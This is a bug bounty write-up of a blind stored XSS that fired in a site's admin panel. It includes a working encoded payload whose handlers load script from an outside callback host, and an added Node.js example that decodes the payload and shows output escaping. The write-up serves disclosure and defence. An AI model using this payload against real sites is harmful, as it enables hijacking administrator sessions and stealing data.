Blind XSS fired on Admin panel worth $2000


Description:

The vulnerability was a blind stored cross-site scripting (XSS) bug. An attacker could inject a script payload into user-generated content; the application stored it in the database and later rendered it, unescaped, in the administrator dashboard (admin.redacted.com), where it executed in the admin's browser. It is "blind" because the attacker never sees the page where the payload runs and only learns of it when the payload calls back.

Proof of concept:

1. Log in to your account on redacted.com.

2. Create a post page.

3. Fill the title and post body with a blind XSS payload.

*In this case I used an xsshunter payload.

"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veTEueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw&#61;&#61; onerror=eval(atob(this.id))>"><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veTEueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw&#61;&#61;>

4. Now publish the post.

5. Now log in to another account, navigate to the post URL, and report the content.

After 3 days my payload fired on admin.redacted.com when an administrator viewed my reported content.

The team rewarded me with $2000, 8 days after I submitted the report.
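To make the mechanics of the PoC concrete, here is an added example (not code from the original write-up or from xsshunter) that does two things: it decodes the posted payload to show what `onerror=eval(atob(this.id))` actually runs, and it contrasts a hypothetical admin-panel view that drops report text straight into the page with one that HTML-escapes it first. The `renderReportUnsafe`/`renderReportSafe` functions and the `containsActiveMarkup` heuristic are assumptions for illustration; only the payload string itself comes from the write-up. Runs under Node.js with no dependencies.

```javascript
// Added example, not part of the original write-up: dissect the posted xsshunter-style
// payload and show the output-encoding change that would have stopped it.

// The payload exactly as it appears in the write-up. The "&#61;" entities are how the
// base64 padding "==" is written so it survives being placed in an HTML attribute.
const PAYLOAD = '"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veTEueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw&#61;&#61; onerror=eval(atob(this.id))>"><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veTEueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw&#61;&#61;>';

// Decode numeric character references the way the HTML parser does before atob() sees the id.
function decodeNumericEntities(s) {
  return s
    .replace(/&#(\d+);/g, (_, n) => String.fromCodePoint(Number(n)))
    .replace(/&#x([0-9a-f]+);/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)));
}

// Pull every id=... value that onerror=eval(atob(this.id)) would decode, and decode it.
// Returns the loader script(s) the browser would execute when the <img>/<source> fails to load.
function extractLoaders(payload) {
  const ids = [...payload.matchAll(/\bid=([A-Za-z0-9+/]+(?:&#61;|=)*)/g)].map(m => m[1]);
  return ids.map(id => Buffer.from(decodeNumericEntities(id), 'base64').toString('utf8'));
}

// Minimal HTML escaper for text interpolated into an HTML body or a quoted attribute.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// Demonstration heuristic only (not a sanitizer): does the rendered HTML still contain
// an element that carries an inline on*= event handler?
function containsActiveMarkup(html) {
  return /<[a-z][^>]*\son[a-z]+\s*=/i.test(html);
}

// Hypothetical admin-panel report view (assumption; the real template is not in the write-up).
// The vulnerable version interpolates the reported post body as raw HTML.
function renderReportUnsafe(reportBody) {
  return `<div class="report-body">${reportBody}</div>`;
}

// The fixed version escapes it, so the payload is shown as text and never becomes a tag.
function renderReportSafe(reportBody) {
  return `<div class="report-body">${escapeHtml(reportBody)}</div>`;
}

console.log('loader(s) hidden in the payload:', extractLoaders(PAYLOAD));
console.log('unsafe render contains event handler:', containsActiveMarkup(renderReportUnsafe(PAYLOAD)));
console.log('safe render contains event handler:  ', containsActiveMarkup(renderReportSafe(PAYLOAD)));
```

The decoded id is a one-line loader that appends a `<script>` pointing at the xsshunter callback host, which is why the finder gets a report (URL, cookies, DOM) from the admin origin days later. Note that the payload opens with `">` so it works whether the post body lands in an attribute or in element content, and carries two triggers (`<img onerror>` and `<video><source onerror>`) in case one tag is stripped. Escaping at the point of output neutralises both without needing to recognise either.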

Impact:

An attacker exploiting this vulnerability runs arbitrary JavaScript in an administrator's browser, in the origin of admin.redacted.com. From there they can read sensitive information shown in the panel and perform admin actions through the administrator's authenticated session; this works even when the session cookie is HttpOnly, because the requests are issued from the admin's own browser. If the cookie is not HttpOnly, the script can also exfiltrate it, and the attacker can then use the stolen admin session directly to access the panel and act on the admin's behalf, potentially taking control of the application.

Follow me on Twitter: https://twitter.com/feribytex
